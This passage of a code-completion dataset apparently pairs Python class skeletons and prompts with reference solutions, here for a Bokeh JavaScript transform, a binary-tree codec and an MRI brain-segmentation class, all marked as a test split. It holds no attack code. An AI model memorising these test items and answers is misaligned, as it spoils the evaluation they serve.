code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. 
code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n", "source": "the_stack_v2_python_sparse", "source_path": "Library/lib/python3.7/site-packages/bokeh-1.4.0-py3.7.egg/bokeh/models/transforms.py", "source_repo": "holzschu/Carnets", "split": "test", "star_events_count": 541} {"blob_id": "f67c0577c557fb3dd5ddcc6e9dc71d18a92b13fc", "bodies": ["def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\nreturn rserialize(root, '')", "def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\ndata_list = data.split(',')\nroot = rdeserialize(data_list)\nreturn root"], "bodies_text": "<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000251", "length_bytes": 2602, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002352", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "revision_id": "f831fd9603592ae5bee3679924f962a3ebce381c", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. 
:type root: Node :rtype: str\"\"\"\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "topic13_tree/T297_Codec/interview.py", "source_repo": "GongFuXiong/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "74d1238680fb22a67c83447af0fe73406e31bc75", "bodies": ["self.model = MRIBET().cuda()\nif weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])", "read_data = nib.load(path)\ndata = read_data.get_fdata().astype(np.float32)\nif img_type == 'T1':\n pass\nelif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\ndata = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\ndata = data.cuda()\nreturn (data, read_data)", "kernel = np.ones((5, 5), np.int8)\ndata = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\ndata = np.transpose(np.asarray(data), (1, 2, 0))\nimg_labels, num_labels = ndimage.label(data)\nsizes = ndimage.sum(data, img_labels, range(num_labels + 1))\nremove_cluster = sizes < np.max(sizes)\nremove_pixel = remove_cluster[img_labels]\ndata[remove_pixel] = 0\ndata[data > 0] = 1\ndata = ndimage.binary_fill_holes(data).astype(np.float32)\nreturn data", "data, read_data = self._preprocessing(path, img_type=img_type)\nself.model.eval()\nmask = np.zeros(np.squeeze(data).shape)\nfor z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\nmask = self._postprocessing(mask)\nmask = mask.astype(np.uint8)\nif save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\nreturn (np.squeeze(data), mask)"], "bodies_text": "<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - 
out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "MRI_BET", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. 
(float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000252", "length_bytes": 8369, "license_type": "permissive", "methods": [{"docstring": "Initialize the model with its weight. 
Args: (string) weight_path : model's weight path", "name": "__init__", "signature": "def __init__(self, weight_path: str=None)"}, {"docstring": "Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)", "name": "_preprocessing", "signature": "def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor"}, {"docstring": "Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)", "name": "_postprocessing", "signature": "def _postprocessing(self, data: np.array) -> np.array"}, {"docstring": "Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask", "name": "predict", "signature": "def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003963", "prompt": "Implement the Python class `MRI_BET` described below.\n\nClass description:\nImplement the MRI_BET class.\n\nMethod signatures and docstrings:\n- def __init__(self, weight_path: str=None): Initialize the model with its weight. Args: (string) weight_path : model's weight path\n- def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor: Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\n- def _postprocessing(self, data: np.array) -> np.array: Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\n- def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]: Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. 
(float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask", "prompted_full_text": "Implement the Python class `MRI_BET` described below.\n\nClass description:\nImplement the MRI_BET class.\n\nMethod signatures and docstrings:\n- def __init__(self, weight_path: str=None): Initialize the model with its weight. Args: (string) weight_path : model's weight path\n- def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor: Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\n- def _postprocessing(self, data: np.array) -> np.array: Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\n- def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]: Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\n\n<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. 
(float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "revision_id": "158a74985074f95fcd6a345c310903936dd2adbe", "skeleton": "<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. 
Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MRI_BET:\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. 
Args: (string) weight_path : model's weight path\"\"\"\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. 
(float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n", "source": "the_stack_v2_python_sparse", "source_path": "medimodule/Brain/module.py", "source_repo": "mi2rl/MI2RLNet", "split": "test", "star_events_count": 